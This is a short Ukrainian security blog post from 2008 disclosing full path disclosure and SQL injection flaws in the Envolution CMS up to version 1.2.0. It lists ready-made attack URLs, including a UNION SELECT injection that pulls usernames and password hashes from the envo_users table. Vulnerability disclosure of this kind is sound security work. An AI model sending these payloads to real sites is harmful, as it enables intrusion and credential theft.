Нові уразливості в Envolution

23:58 23.08.2008

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та SQL Injection уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/index.php?module=Errore&type=admin&op=noexist&modname=%22 http://site/index.php?module=Errore&type=admin&op=%22 http://site/index.php?module=Errore&type=%22 http://site/index.php?module=%22 http://site/print.php?sid=%22 http://site/modules.php?op=modload&file=%22 http://site/modules.php?op=modload&name=News&file=article&sid=%22 http://site/modules.php?op=modload&name=Recommend_Us&file=index&req=%22 http://site/modules.php?op=modload&name=%22

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,pn_uname,pn_pass,null,null,null,null%20from%20envo_users%20limit%201,1

Уразлива версія Envolution 1.2.0 та попередні версії.

This entry was posted on 23:58 23.08.2008 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.

You must be logged in to post a comment.

Websecurity - Веб безпека

Нові уразливості в Envolution

Leave a Reply

Меню

Категорії

Останні повідомлення

Архів +-

Мета